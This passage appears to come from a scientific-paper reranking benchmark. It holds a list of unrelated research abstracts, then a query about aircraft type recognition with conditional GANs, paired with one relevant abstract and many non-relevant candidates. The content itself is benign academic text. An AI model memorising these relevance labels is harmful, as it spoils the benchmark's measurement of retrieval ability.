"text": "In this paper we address the problem of migrating a legacy Web application to a cloud service. We develop a reusable architectural pattern to do so and validate it with a case study of the Beta release of the IBM Bluemix Workflow Service [1] (herein referred to as the Beta Workflow service). It uses Docker [2] containers and a Cloudant [3] persistence layer to deliver a multi-tenant cloud service by re-using a legacy codebase. We are not aware of any literature that addresses this problem by using containers.The Beta Workflow service provides a scalable, stateful, highly available engine to compose services with REST APIs. The composition is modeled as a graph but authored in a Javascript-based domain specific language that specifies a set of activities and control flow links among these activities. The primitive activities in the language can be used to respond to HTTP REST requests, invoke services with REST APIs, and execute Javascript code to, among other uses, extract and construct the data inputs and outputs to external services, and make calls to these services.Examples of workflows that have been built using the service include distributing surveys and coupons to customers of a retail store [1], the management of sales requests between a salesperson and their regional managers, managing the staged deployment of different versions of an application, and the coordinated transfer of jobs among case workers.",
"title": ""
},
{
"docid": "1f56fb6b6f21eb95a903190a826da6f6",
"text": "Frustration is used as a criterion for identifying usability problems (UPs) and for rating their severity in a few of the existing severity scales, but it is not operationalized. No research has systematically examined how frustration varies with the severity of UPs. We aimed to address these issues with a hybrid approach, using Self-Assessment Manikin, comments elicited with Cued-Recall Debrief, galvanic skin responses (GSR) and gaze data. Two empirical studies involving a search task with a website known to have UPs were conducted to substantiate findings and improve on the methodological framework, which could facilitate usability evaluation practice. Results showed no correlation between GSR peaks and severity ratings, but GSR peaks were correlated with frustration scores -- a metric we developed. The Peak-End rule was partially verified. The problematic evaluator effect was the limitation as it confounded the severity ratings of UPs. Future work is aimed to control this effect and to develop a multifaceted severity scale.",
"title": ""
},
{
"docid": "c3e63d82514b9e9b1cc172ea34f7a53e",
"text": "Deep Learning is one of the next big things in Recommendation Systems technology. The past few years have seen the tremendous success of deep neural networks in a number of complex machine learning tasks such as computer vision, natural language processing and speech recognition. After its relatively slow uptake by the recommender systems community, deep learning for recommender systems became widely popular in 2016.\n We believe that a tutorial on the topic of deep learning will do its share to further popularize the topic. Notable recent application areas are music recommendation, news recommendation, and session-based recommendation. The aim of the tutorial is to encourage the application of Deep Learning techniques in Recommender Systems, to further promote research in deep learning methods for Recommender Systems.",
"title": ""
},
{
"docid": "da3634b5a14829b22546389e56425017",
"text": "Homomorphic encryption (HE)—the ability to perform computations on encrypted data—is an attractive remedy to increasing concerns about data privacy in the field of machine learning. However, building models that operate on ciphertext is currently labor-intensive and requires simultaneous expertise in deep learning, cryptography, and software engineering. Deep learning frameworks, together with recent advances in graph compilers, have greatly accelerated the training and deployment of deep learning models to a variety of computing platforms. Here, we introduce nGraph-HE, an extension of the nGraph deep learning compiler, which allows data scientists to deploy trained models with popular frameworks like TensorFlow, MXNet and PyTorch directly, while simply treating HE as another hardware target. This combination of frameworks and graph compilers greatly simplifies the development of privacy-preserving machine learning systems, provides a clean abstraction barrier between deep learning and HE, allows HE libraries to exploit HE-specific graph optimizations, and comes at a low cost in runtime overhead versus native HE operations.",
"title": ""
},
{
"docid": "c89de16110a66d65f8ae7e3476fe90ef",
"text": "In this paper, a new notion which we call private data deduplication protocol, a deduplication technique for private data storage is introduced and formalized. Intuitively, a private data deduplication protocol allows a client who holds a private data proves to a server who holds a summary string of the data that he/she is the owner of that data without revealing further information to the server. Our notion can be viewed as a complement of the state-of-the-art public data deduplication protocols of Halevi et al [7]. The security of private data deduplication protocols is formalized in the simulation-based framework in the context of two-party computations. A construction of private deduplication protocols based on the standard cryptographic assumptions is then presented and analyzed. We show that the proposed private data deduplication protocol is provably secure assuming that the underlying hash function is collision-resilient, the discrete logarithm is hard and the erasure coding algorithm can erasure up to α-fraction of the bits in the presence of malicious adversaries in the presence of malicious adversaries. To the best our knowledge this is the first deduplication protocol for private data storage.",
"title": ""
},
{
"docid": "57accb84a15f3b3767ef9a4a524e29b8",
"text": "Drosophila melanogaster activates a variety of immune responses against microbial infections. However, information on the Drosophila immune response to entomopathogenic nematode infections is currently limited. The nematode Heterorhabditis bacteriophora is an insect parasite that forms a mutualistic relationship with the gram-negative bacteria Photorhabdus luminescens. Following infection, the nematodes release the bacteria that quickly multiply within the insect and produce several toxins that eventually kill the host. Although we currently know that the insect immune system interacts with Photorhabdus, information on interaction with the nematode vector is scarce. Here we have used next generation RNA-sequencing to analyze the transcriptional profile of wild-type adult flies infected by axenic Heterorhabditis nematodes (lacking Photorhabdus bacteria), symbiotic Heterorhabditis nematodes (carrying Photorhabdus bacteria), and Photorhabdus bacteria alone. We have obtained approximately 54 million reads from the different infection treatments. Bioinformatic analysis shows that infection with Photorhabdus alters the transcription of a large number of Drosophila genes involved in translational repression as well in response to stress. However, Heterorhabditis infection alters the transcription of several genes that participate in lipidhomeostasis and metabolism, stress responses, DNA/protein sythesis and neuronal functions. We have also identified genes in the fly with potential roles in nematode recognition, anti-nematode activity and nociception. These findings provide fundamental information on the molecular events that take place in Drosophila upon infection with the two pathogens, either separately or together. Such large-scale transcriptomic analyses set the stage for future functional studies aimed at identifying the exact role of key factors in the Drosophila immune response against nematode-bacteria complexes.",
"title": ""
},
{
"docid": "6a80eb8001380f4d63a8cf3f3693f73c",
"text": "Traditional energy measurement fails to provide support to consumers to make intelligent decisions to save energy. Non-intrusive load monitoring is one solution that provides disaggregated power consumption profiles. Machine learning approaches rely on public datasets to train parameters for their algorithms, most of which only provide low-frequency appliance-level measurements, thus limiting the available feature space for recognition.\n In this paper, we propose a low-cost measurement system for high-frequency energy data. Our work utilizes an off-the-shelf power strip with a voltage-sensing circuit, current sensors, and a single-board PC as data aggregator. We develop a new architecture and evaluate the system in real-world environments. The self-contained unit for six monitored outlets can achieve up to 50 kHz for all signals simultaneously. A simple design and off-the-shelf components allow us to keep costs low. Equipping a building with our measurement systems is more feasible compared to expensive existing solutions. We used the outlined system architecture to manufacture 20 measurement systems to collect energy data over several months of more than 50 appliances at different locations, with an aggregated size of 15 TB.",
"title": ""
},
{
"docid": "e66f94aeea80b7efb6a35abd9a764aea",
"text": "A non-linear poroelastic finite element model of the lumbar spine was developed to investigate spinal response during daily dynamic physiological activities. Swelling was simulated by imposing a boundary pore pressure of 0.25 MPa at all external surfaces. Partial saturation of the disc was introduced to circumvent the negative pressures otherwise computed upon unloading. The loading conditions represented a pre-conditioning full day followed by another day of loading: 8h rest under a constant compressive load of 350 N, followed by 16 h loading phase under constant or cyclic compressive load varying in between 1000 and 1600 N. In addition, the effect of one or two short resting periods in the latter loading phase was studied. The model yielded fairly good agreement with in-vivo and in-vitro measurements. Taking the partial saturation of the disc into account, no negative pore pressures were generated during unloading and recovery phase. Recovery phase was faster than the loading period with equilibrium reached in only approximately 3h. With time and during the day, the axial displacement, fluid loss, axial stress and disc radial strain increased whereas the pore pressure and disc collagen fiber strains decreased. The fluid pressurization and collagen fiber stiffening were noticeable early in the morning, which gave way to greater compression stresses and radial strains in the annulus bulk as time went by. The rest periods dampened foregoing differences between the early morning and late in the afternoon periods. The forgoing diurnal variations have profound effects on lumbar spine biomechanics and risk of injury.",
"title": ""
},
{
"docid": "9a38b18bd69d17604b6e05b9da450c2d",
"text": "New invention of advanced technology, enhanced capacity of storage media, maturity of information technology and popularity of social media, business intelligence and Scientific invention, produces huge amount of data which made ample set of information that is responsible for birth of new concept well known as big data. Big data analytics is the process of examining large amounts of data. The analysis is done on huge amount of data which is structure, semi structure and unstructured. In big data, data is generated at exponentially for reason of increase use of social media, email, document and sensor data. The growth of data has affected all fields, whether it is business sector or the world of science. In this paper, the process of system is reviewed for managing "Big Data" and today's activities on big data tools and techniques.",
"title": ""
},
{
"docid": "346349308d49ac2d3bb1cfa5cc1b429c",
"text": "The prevalent approach to sequence to sequence learning maps an input sequence to a variable length output sequence via recurrent neural networks. We introduce an architecture based entirely on convolutional neural networks.1 Compared to recurrent models, computations over all elements can be fully parallelized during training and optimization is easier since the number of non-linearities is fixed and independent of the input length. Our use of gated linear units eases gradient propagation and we equip each decoder layer with a separate attention module. We outperform the accuracy of the deep LSTM setup of Wu et al. (2016) on both WMT’14 EnglishGerman and WMT’14 English-French translation at an order of magnitude faster speed, both on GPU and CPU.",
"title": ""
},
{
"docid": "405022c5a2ca49973eaaeb1e1ca33c0f",
"text": "BACKGROUND\nPreanalytical factors are the main source of variation in clinical chemistry testing and among the major determinants of preanalytical variability, sample hemolysis can exert a strong influence on result reliability. Hemolytic samples are a rather common and unfavorable occurrence in laboratory practice, as they are often considered unsuitable for routine testing due to biological and analytical interference. However, definitive indications on the analytical and clinical management of hemolyzed specimens are currently lacking. Therefore, the present investigation evaluated the influence of in vitro blood cell lysis on routine clinical chemistry testing.\n\n\nMETHODS\nNine aliquots, prepared by serial dilutions of homologous hemolyzed samples collected from 12 different subjects and containing a final concentration of serum hemoglobin ranging from 0 to 20.6 g/L, were tested for the most common clinical chemistry analytes. Lysis was achieved by subjecting whole blood to an overnight freeze-thaw cycle.\n\n\nRESULTS\nHemolysis interference appeared to be approximately linearly dependent on the final concentration of blood-cell lysate in the specimen. This generated a consistent trend towards overestimation of alanine aminotransferase (ALT), aspartate aminotransferase (AST), creatinine, creatine kinase (CK), iron, lactate dehydrogenase (LDH), lipase, magnesium, phosphorus, potassium and urea, whereas mean values of albumin, alkaline phosphatase (ALP), chloride, gamma-glutamyltransferase (GGT), glucose and sodium were substantially decreased. Clinically meaningful variations of AST, chloride, LDH, potassium and sodium were observed in specimens displaying mild or almost undetectable hemolysis by visual inspection (serum hemoglobin < 0.6 g/L). The rather heterogeneous and unpredictable response to hemolysis observed for several parameters prevented the adoption of reliable statistic corrective measures for results on the basis of the degree of hemolysis.\n\n\nCONCLUSION\nIf hemolysis and blood cell lysis result from an in vitro cause, we suggest that the most convenient corrective solution might be quantification of free hemoglobin, alerting the clinicians and sample recollection.",
"title": ""
},
{
"docid": "1d9b50bf7fa39c11cca4e864bbec5cf3",
"text": "FPGA-based embedded soft vector processors can exceed the performance and energy-efficiency of embedded GPUs and DSPs for lightweight deep learning applications. For low complexity deep neural networks targeting resource constrained platforms, we develop optimized Caffe-compatible deep learning library routines that target a range of embedded accelerator-based systems between 4 -- 8 W power budgets such as the Xilinx Zedboard (with MXP soft vector processor), NVIDIA Jetson TK1 (GPU), InForce 6410 (DSP), TI EVM5432 (DSP) as well as the Adapteva Parallella board (custom multi-core with NoC). For MNIST (28×28 images) and CIFAR10 (32×32 images), the deep layer structure is amenable to MXP-enhanced FPGA mappings to deliver 1.4 -- 5× higher energy efficiency than all other platforms. Not surprisingly, embedded GPU works better for complex networks with large image resolutions.",
"title": ""
},
{
"docid": "4413ef4f192d5061da7bf2baa82c9048",
"text": "We developed and piloted a program for first-grade students to promote development of legible handwriting and writing fluency. The Write Start program uses a coteaching model in which occupational therapists and teachers collaborate to develop and implement a handwriting-writing program. The small-group format with embedded individualized supports allows the therapist to guide and monitor student performance and provide immediate feedback. The 12-wk program was implemented with 1 class of 19 students. We administered the Evaluation of Children's Handwriting Test, Minnesota Handwriting Assessment, and Woodcock-Johnson Fluency and Writing Samples test at baseline, immediately after the Write Start program, and at the end of the school year. Students made large, significant gains in handwriting legibility and speed and in writing fluency that were maintained at 6-mo follow-up. The Write Start program appears to promote handwriting and writing skills in first-grade students and is ready for further study in controlled trials.",
"title": ""
},
{
"docid": "3b145aa14e1052467f78b911cda4109b",
"text": "Dual Connectivity(DC) is one of the key technologies standardized in Release 12 of the 3GPP specifications for the Long Term Evolution (LTE) network. It attempts to increase the per-user throughput by allowing the user equipment (UE) to maintain connections with the MeNB (master eNB) and SeNB (secondary eNB) simultaneously, which are inter-connected via non-ideal backhaul. In this paper, we focus on one of the use cases of DC whereby the downlink U-plane data is split at the MeNB and transmitted to the UE via the associated MeNB and SeNB concurrently. In this case, out-of-order packet delivery problem may occur at the UE due to the delay over the non-ideal backhaul link, as well as the dynamics of channel conditions over the MeNB-UE and SeNB-UE links, which will introduce extra delay for re-ordering the packets. As a solution, we propose to adopt the RaptorQ FEC code to encode the source data at the MeNB, and then the encoded symbols are separately transmitted through the MeNB and SeNB. The out-of-order problem can be effectively eliminated since the UE can decode the original data as long as it receives enough encoded symbols from either the MeNB or SeNB. We present detailed protocol design for the RaptorQ code based concurrent transmission scheme, and simulation results are provided to illustrate the performance of the proposed scheme.",
"title": ""
},
{
"docid": "c89347bd4819678592699b1cc982436f",
"text": "Online tracking is evolving from browserand devicetracking to people-tracking. As users are increasingly accessing the Internet from multiple devices this new paradigm of tracking—in most cases for purposes of advertising—is aimed at crossing the boundary between a user’s individual devices and browsers. It establishes a person-centric view of a user across devices and seeks to combine the input from various data sources into an individual and comprehensive user profile. By its very nature such cross-device tracking can principally reveal a complete picture of a person and, thus, become more privacy-invasive than the siloed tracking via HTTP cookies or other traditional and more limited tracking mechanisms. In this study we are exploring cross-device tracking techniques as well as their privacy implications. Particularly, we demonstrate a method to detect the occurrence of cross-device tracking, and, based on a cross-device tracking dataset that we collected from 126 Internet users, we explore the prevalence of cross-device trackers on mobile and desktop devices. We show that the similarity of IP addresses and Internet history for a user’s devices gives rise to a matching rate of F-1 = 0.91 for connecting a mobile to a desktop device in our dataset. This finding is especially noteworthy in light of the increase in learning power that cross-device companies may achieve by leveraging user data from more than one device. Given these privacy implications of cross-device tracking we also examine compliance with applicable self-regulation for 40 cross-device companies and find that some are not transparent about their practices.",
"title": ""
},
{
"docid": "d3afbb88f0575bd18365c85c6faea868",
"text": "The present paper examines the causal linkage between foreign direct investment (FDI), financial development, and economic growth in a panel of 4 countries of North Africa (Tunisia, Morocco, Algeria and Egypt) over the period 1980-2011. The study moves away from the traditional cross-sectional analysis, and focuses on more direct evidence of the channels through which FDI inflows can promote economic growth of the host country. Using Generalized Method of Moment (GMM) panel data analysis, we find strong evidence of a positive relationship between FDI and economic growth. We also find evidence that the development of the domestic financial system is an important prerequisite for FDI to have a positive effect on economic growth. The policy implications of this study appeared clear. Improvement efforts need to be driven by local-level reforms to ensure the development of domestic financial system in order to maximize the benefits of the presence of FDI.",
"title": ""
}
] | scidocsrr |
f052a71984bc134746a0c54fc720513f | Aircraft Type Recognition in Remote Sensing Images Based on Feature Learning with Conditional Generative Adversarial Networks | [
{
"docid": "f1deb9134639fb8407d27a350be5b154",
"text": "This work introduces a novel Convolutional Network architecture for the task of human pose estimation. Features are processed across all scales and consolidated to best capture the various spatial relationships associated with the body. We show how repeated bottom-up, top-down processing used in conjunction with intermediate supervision is critical to improving the performance of the network. We refer to the architecture as a ‘stacked hourglass’ network based on the successive steps of pooling and upsampling that are done to produce a final set of estimates. State-of-the-art results are achieved on the FLIC and MPII benchmarks outcompeting all recent methods.",
"title": ""
}
] | [
{
"docid": "d90add899632bab1c5c2637c7080f717",
"text": "Software Testing plays a important role in Software development because it can minimize the development cost. We Propose a Technique for Test Sequence Generation using UML Model Sequence Diagram.UML models give a lot of information that should not be ignored in testing. In This paper main features extract from Sequence Diagram after that we can write the Java Source code for that Features According to ModelJunit Library. ModelJUnit is a extended library of JUnit Library. By using that Source code we can Generate Test Case Automatic and Test Coverage. This paper describes a systematic Test Case Generation Technique performed on model based testing (MBT) approaches By Using Sequence Diagram.",
"title": ""
},
{
"docid": "cd0c1507c1187e686c7641388413d3b5",
"text": "Inference of three-dimensional motion from the fusion of inertial and visual sensory data has to contend with the preponderance of outliers in the latter. Robust filtering deals with the joint inference and classification task of selecting which data fits the model, and estimating its state. We derive the optimal discriminant and propose several approximations, some used in the literature, others new. We compare them analytically, by pointing to the assumptions underlying their approximations, and empirically. We show that the best performing method improves the performance of state-of-the-art visual-inertial sensor fusion systems, while retaining the same computational complexity.",
"title": ""
},
{
"docid": "736a413352df6b0225b4d567a26a5d78",
"text": "This letter presents a compact, single-feed, dual-band antenna covering both the 433-MHz and 2.45-GHz Industrial Scientific and Medical (ISM) bands. The antenna has small dimensions of 51 ×28 mm2. A square-spiral resonant element is printed on the top layer for the 433-MHz band. The remaining space within the spiral is used to introduce an additional parasitic monopole element on the bottom layer that is resonant at 2.45 GHz. Measured results show that the antenna has a 10-dB return-loss bandwidth of 2 MHz at 433 MHz and 132 MHz at 2.45 GHz, respectively. The antenna has omnidirectional radiation characteristics with a peak realized gain (measured) of -11.5 dBi at 433 MHz and +0.5 dBi at 2.45 GHz, respectively.",
"title": ""
},
{
"docid": "4f511a669a510153aa233d90da4e406a",
"text": "In many visual surveillance applications the task of person detection and localization can be solved easier by using thermal long-wave infrared (LWIR) cameras which are less affected by changing illumination or background texture than visual-optical cameras. Especially in outdoor scenes where usually only few hot spots appear in thermal infrared imagery, humans can be detected more reliably due to their prominent infrared signature. We propose a two-stage person recognition approach for LWIR images: (1) the application of Maximally Stable Extremal Regions (MSER) to detect hot spots instead of background subtraction or sliding window and (2) the verification of the detected hot spots using a Discrete Cosine Transform (DCT) based descriptor and a modified Random Naïve Bayes (RNB) classifier. The main contributions are the novel modified RNB classifier and the generality of our method. We achieve high detection rates for several different LWIR datasets with low resolution videos in real-time. While many papers in this topic are dealing with strong constraints such as considering only one dataset, assuming a stationary camera, or detecting only moving persons, we aim at avoiding such constraints to make our approach applicable with moving platforms such as Unmanned Ground Vehicles (UGV).",
"title": ""
},
{
"docid": "7d3ef8bdc50bd2931d8cb31683b35e90",
"text": "This paper characterizes the performance of a generic $K$-tier cache-aided heterogeneous network (CHN), in which the base stations (BSs) across tiers differ in terms of their spatial densities, transmission powers, pathloss exponents, activity probabilities conditioned on the serving link and placement caching strategies. We consider that each user connects to the BS which maximizes its average received power and at the same time caches its file of interest. Modeling the locations of the BSs across different tiers as independent homogeneous Poisson Point processes (HPPPs), we derive closed-form expressions for the coverage probability and local delay experienced by a typical user in receiving each requested file. We show that our results for coverage probability and delay are consistent with those previously obtained in the literature for a single tier system.",
"title": ""
},
{
"docid": "71b5c8679979cccfe9cad229d4b7a952",
"text": "Despite widespread adoption, machine learning models remain mostly black boxes. Understanding the reasons behind predictions is, however, quite important in assessing trust, which is fundamental if one plans to take action based on a prediction, or when choosing whether to deploy a new model. Such understanding also provides insights into the model, which can be used to transform an untrustworthy model or prediction into a trustworthy one.\n In this work, we propose LIME, a novel explanation technique that explains the predictions of any classifier in an interpretable and faithful manner, by learning an interpretable model locally varound the prediction. We also propose a method to explain models by presenting representative individual predictions and their explanations in a non-redundant way, framing the task as a submodular optimization problem. We demonstrate the flexibility of these methods by explaining different models for text (e.g. random forests) and image classification (e.g. neural networks). We show the utility of explanations via novel experiments, both simulated and with human subjects, on various scenarios that require trust: deciding if one should trust a prediction, choosing between models, improving an untrustworthy classifier, and identifying why a classifier should not be trusted.",
"title": ""
},
{
"docid": "c056fa934bbf9bc6a286cd718f3a7217",
"text": "The advent of deep sub-micron technology has exacerbated reliability issues in on-chip interconnects. In particular, single event upsets, such as soft errors, and hard faults are rapidly becoming a force to be reckoned with. This spiraling trend highlights the importance of detailed analysis of these reliability hazards and the incorporation of comprehensive protection measures into all network-on-chip (NoC) designs. In this paper, we examine the impact of transient failures on the reliability of on-chip interconnects and develop comprehensive counter-measures to either prevent or recover from them. In this regard, we propose several novel schemes to remedy various kinds of soft error symptoms, while keeping area and power overhead at a minimum. Our proposed solutions are architected to fully exploit the available infrastructures in an NoC and enable versatile reuse of valuable resources. The effectiveness of the proposed techniques has been validated using a cycle-accurate simulator",
"title": ""
},
{
"docid": "6148a8847c01d46931250b959087b1b1",
"text": "Recognizing visual content in unconstrained videos has become a very important problem for many applications. Existing corpora for video analysis lack scale and/or content diversity, and thus limited the needed progress in this critical area. In this paper, we describe and release a new database called CCV, containing 9,317 web videos over 20 semantic categories, including events like \"baseball\" and \"parade\", scenes like \"beach\", and objects like \"cat\". The database was collected with extra care to ensure relevance to consumer interest and originality of video content without post-editing. Such videos typically have very little textual annotation and thus can benefit from the development of automatic content analysis techniques.\n We used Amazon MTurk platform to perform manual annotation, and studied the behaviors and performance of human annotators on MTurk. We also compared the abilities in understanding consumer video content by humans and machines. For the latter, we implemented automatic classifiers using state-of-the-art multi-modal approach that achieved top performance in recent TRECVID multimedia event detection task. Results confirmed classifiers fusing audio and video features significantly outperform single-modality solutions. We also found that humans are much better at understanding categories of nonrigid objects such as \"cat\", while current automatic techniques are relatively close to humans in recognizing categories that have distinctive background scenes or audio patterns.",
"title": ""
},
{
"docid": "b700f3c79d55a2251c84c227104e9eee",
"text": "Recurrent neural network language models (RNNLMs) are becoming increasingly popular for a range of applications inc luding speech recognition. However, an important issue that li mi s the quantity of data, and hence their possible application a reas, is the computational cost in training. A standard appro ach to handle this problem is to use class-based outputs, allowi ng systems to be trained on CPUs. This paper describes an alternative approach that allows RNNLMs to be efficiently trained on GPUs. This enables larger quantities of data to be used, an d networks with an unclustered, full output layer to be traine d. To improve efficiency on GPUs, multiple sentences are “spliced ” together for each mini-batch or “bunch” in training. On a lar ge vocabulary conversational telephone speech recognition t ask, the training time was reduced by a factor of 27 over the standard CPU-based RNNLM toolkit. The use of an unclustered, full output layer also improves perplexity and recognition performance over class-based RNNLMs.",
"title": ""
},
{
"docid": "e5bf5516cdd531b85f02ac258420f5ef",
"text": "Management literature is almost unanimous in suggesting to manufacturers that they should integrate services into their core product offering. The literature, however, is surprisingly sparse in describing to what extent services should be integrated, how this integration should be carried out, or in detailing the challenges inherent in the transition to services. Reports on a study of 11 capital equipment manufacturers developing service offerings for their products. Focuses on identifying the dimensions considered when creating a service organization in the context of a manufacturing ®rm, and successful strategies to navigate the transition. Analysis of qualitative data suggests that the transition involves a deliberate developmental process to build capabilities as ®rms shift the nature of the relationship with the product end-users and the focus of the service offering. The report concludes identifying implications of our ®ndings for further research and practitioners.",
"title": ""
},
{
"docid": "8ecd81f0078666a91a8c4183c2cb5a11",
"text": "Due to the broadcast nature of radio propagation, the wireless air interface is open and accessible to both authorized and illegitimate users. This completely differs from a wired network, where communicating devices are physically connected through cables and a node without direct association is unable to access the network for illicit activities. The open communications environment makes wireless transmissions more vulnerable than wired communications to malicious attacks, including both the passive eavesdropping for data interception and the active jamming for disrupting legitimate transmissions. Therefore, this paper is motivated to examine the security vulnerabilities and threats imposed by the inherent open nature of wireless communications and to devise efficient defense mechanisms for improving the wireless network security. We first summarize the security requirements of wireless networks, including their authenticity, confidentiality, integrity, and availability issues. Next, a comprehensive overview of security attacks encountered in wireless networks is presented in view of the network protocol architecture, where the potential security threats are discussed at each protocol layer. We also provide a survey of the existing security protocols and algorithms that are adopted in the existing wireless network standards, such as the Bluetooth, Wi-Fi, WiMAX, and the long-term evolution (LTE) systems. Then, we discuss the state of the art in physical-layer security, which is an emerging technique of securing the open communications environment against eavesdropping attacks at the physical layer. Several physical-layer security techniques are reviewed and compared, including information-theoretic security, artificial-noise-aided security, security-oriented beamforming, diversity-assisted security, and physical-layer key generation approaches. Since a jammer emitting radio signals can readily interfere with the legitimate wireless users, we also introduce the family of various jamming attacks and their countermeasures, including the constant jammer, intermittent jammer, reactive jammer, adaptive jammer, and intelligent jammer. Additionally, we discuss the integration of physical-layer security into existing authentication and cryptography mechanisms for further securing wireless networks. Finally, some technical challenges which remain unresolved at the time of writing are summarized and the future trends in wireless security are discussed.",
"title": ""
},
{
"docid": "6649b5482a9a5413059ff4f9446223c6",
"text": "The emergence of drug resistance to traditional chemotherapy and newer targeted therapies in cancer patients is a major clinical challenge. Reactivation of the same or compensatory signaling pathways is a common class of drug resistance mechanisms. Employing drug combinations that inhibit multiple modules of reactivated signaling pathways is a promising strategy to overcome and prevent the onset of drug resistance. However, with thousands of available FDA-approved and investigational compounds, it is infeasible to experimentally screen millions of possible drug combinations with limited resources. Therefore, computational approaches are needed to constrain the search space and prioritize synergistic drug combinations for preclinical studies. In this study, we propose a novel approach for predicting drug combinations through investigating potential effects of drug targets on disease signaling network. We first construct a disease signaling network by integrating gene expression data with disease-associated driver genes. Individual drugs that can partially perturb the disease signaling network are then selected based on a drug-disease network \"impact matrix\", which is calculated using network diffusion distance from drug targets to signaling network elements. The selected drugs are subsequently clustered into communities (subgroups), which are proposed to share similar mechanisms of action. Finally, drug combinations are ranked according to maximal impact on signaling sub-networks from distinct mechanism-based communities. Our method is advantageous compared to other approaches in that it does not require large amounts drug dose response data, drug-induced \"omics\" profiles or clinical efficacy data, which are not often readily available. We validate our approach using a BRAF-mutant melanoma signaling network and combinatorial in vitro drug screening data, and report drug combinations with diverse mechanisms of action and opportunities for drug repositioning.",
"title": ""
},
{
"docid": "f30a47ffc303584728e0bdddd1a1c478",
"text": "2 Introduction 1 An intense debate has raged for years over Africa's economic difficulties. Aside from the obvious problems of warfare, drought, and disease, the usual suspect is economic policy. However, the record of over a decade of structural adjustment efforts is difficult to read. A recent analysis by the World Bank provides significant evidence that improved policies lead to improved prospects for growth, and that the continuing economic problems in Africa are the result of a failure to carry liberalization far enough (World Bank 1993a). According to that analysis, no African governments were rated as having \" good \" economic policies and only one, Ghana, was deemed \" adequate; \" with an annual growth rate of 1.3 percent per capita (1987-1991). Opponents of World Bank/IMF policy have criticized the Bank's analysis on numerous grounds, but even World Bank economists mutter that rates of private investment and economic growth are higher in Viet Nam and China (whose economic policies still bear a strong socialist imprint) than almost anywhere in Africa. Something more than standard macroeconomic policy failures must be at work. This paper focuses on one of the \" usual suspects \"-rent seeking by officials at the highest government levels. Based on both theory and concrete African examples, it demonstrates how such rent seeking can harm an economy and stifle investment and growth. \" Rent seeking \" is often used interchangeably with \" corruption, \" and there is a large area of overlap. While corruption involves the misuse of public power for private gain, rent seeking derives from the economic concept of \" rent \"-earnings in excess of all relevant costs (including a market rate of return on invested assets). Rent is equivalent to what most non-economists think of as monopoly 3 profits. Rent seeking is then the effort to acquire access to or control over opportunities for earning rents. These efforts are not necessarily illegal, or even immoral. They include much lobbying and some forms of advertising. Some can be efficient, such as an auction of scare and valuable assets. However, economists and public sector management specialists are concerned with what Jagdish Bhagwati termed \" directly unproductive \" rent seeking activities, because they waste resources and can contribute to economic inefficiency (Bhagwati 1974, see also Krueger 1974). Corruption and other forms of rent seeking have been well-documented in every society on earth, from the banks of the Congo River …",
"title": ""
},
{
"docid": "99ed7c5c5315a74491c26b88bfa60965",
"text": "Data deduplication is one of important data compression techniques for eliminating duplicate copies of repeating data, and has been widely used in cloud storage to reduce the amount of storage space and save bandwidth. To protect the confidentiality of sensitive data while supporting deduplication, the convergent encryption technique has been proposed to encrypt the data before outsourcing. To better protect data security, this paper makes the first attempt to formally address the problem of authorized data deduplication. Different from traditional deduplication systems, the differential privileges of users are further considered in duplicate check besides the data itself. We also present several new deduplication constructions supporting authorized duplicate check in a hybrid cloud architecture. Security analysis demonstrates that our scheme is secure in terms of the definitions specified in the proposed security model. As a proof of concept, we implement a prototype of our proposed authorized duplicate check scheme and conduct testbed experiments using our prototype. We show that our proposed authorized duplicate check scheme incurs minimal overhead compared to normal operations.",
"title": ""
},
{
"docid": "d9e6ebe6d0a4cebddd8e1809377c2552",
"text": "Real-time approach for monocular visual simultaneous localization and mapping (SLAM) within a large-scale environment is proposed. From a monocular video sequence, the proposed method continuously computes the current 6-DOF camera pose and 3D landmarks position. The proposed method successfully builds consistent maps from challenging outdoor sequences using a monocular camera as the only sensor, while existing approaches have utilized additional structural information such as camera height from the ground. By using a binary descriptor and metric-topological mapping, the system demonstrates real-time performance on a large-scale outdoor environment without utilizing GPUs or reducing input image size. The effectiveness of the proposed method is demonstrated on various challenging video sequences including the KITTI dataset and indoor video captured on a micro aerial vehicle.",
"title": ""
},
{
"docid": "3b0a36f6d484705f8a68ae4a928b743e",
"text": "Solution The unique pure strategy subgame perfect equilibrium is (Rr, r). 2. (30pts.) An entrepreneur has a project that she presents to a capitalist. She has her own money that she could invest in the project and is looking for additional funding from the capitalist. The project is either good (denoted g) (with probability p) or it is bad (denoted b) (with probability 1− p) and only the entrepreneur knows the quality of the project. The entrepreneur (E) decides whether to invest her own money (I) or not (N), the capitalist (C) observes whether the entrepreneur has invested or not and then decides whether to invest his money (i) or not (n). Figure 1 represents the game and gives the payoffs, where the first number is the entrepreneur’s payoff and the second number is the capitalist’s. (a) (20pts.) Find the set of pure strategy perfect Bayesian equilibria of this game.",
"title": ""
},
{
"docid": "f829097794802117bf37ea8ce891611a",
"text": "Manually crafted combinatorial features have been the \"secret sauce\" behind many successful models. For web-scale applications, however, the variety and volume of features make these manually crafted features expensive to create, maintain, and deploy. This paper proposes the Deep Crossing model which is a deep neural network that automatically combines features to produce superior models. The input of Deep Crossing is a set of individual features that can be either dense or sparse. The important crossing features are discovered implicitly by the networks, which are comprised of an embedding and stacking layer, as well as a cascade of Residual Units. Deep Crossing is implemented with a modeling tool called the Computational Network Tool Kit (CNTK), powered by a multi-GPU platform. It was able to build, from scratch, two web-scale models for a major paid search engine, and achieve superior results with only a sub-set of the features used in the production models. This demonstrates the potential of using Deep Crossing as a general modeling paradigm to improve existing products, as well as to speed up the development of new models with a fraction of the investment in feature engineering and acquisition of deep domain knowledge.",
"title": ""
},
{
"docid": "cf2e54d22fbf261a51a226f7f5adc4f5",
"text": "We propose a new fast, robust and controllable method to simulate the dynamic destruction of large and complex objects in real time. The common method for fracture simulation in computer games is to pre-fracture models and replace objects by their pre-computed parts at run-time. This popular method is computationally cheap but has the disadvantages that the fracture pattern does not align with the impact location and that the number of hierarchical fracture levels is fixed. Our method allows dynamic fracturing of large objects into an unlimited number of pieces fast enough to be used in computer games. We represent visual meshes by volumetric approximate convex decompositions (VACD) and apply user-defined fracture patterns dependent on the impact location. The method supports partial fracturing meaning that fracture patterns can be applied locally at multiple locations of an object. We propose new methods for computing a VACD, for approximate convex hull construction and for detecting islands in the convex decomposition after partial destruction in order to determine support structures.",
"title": ""
},
{
"docid": "7476aafb8ceff37ab941c7b1d57d7c2b",
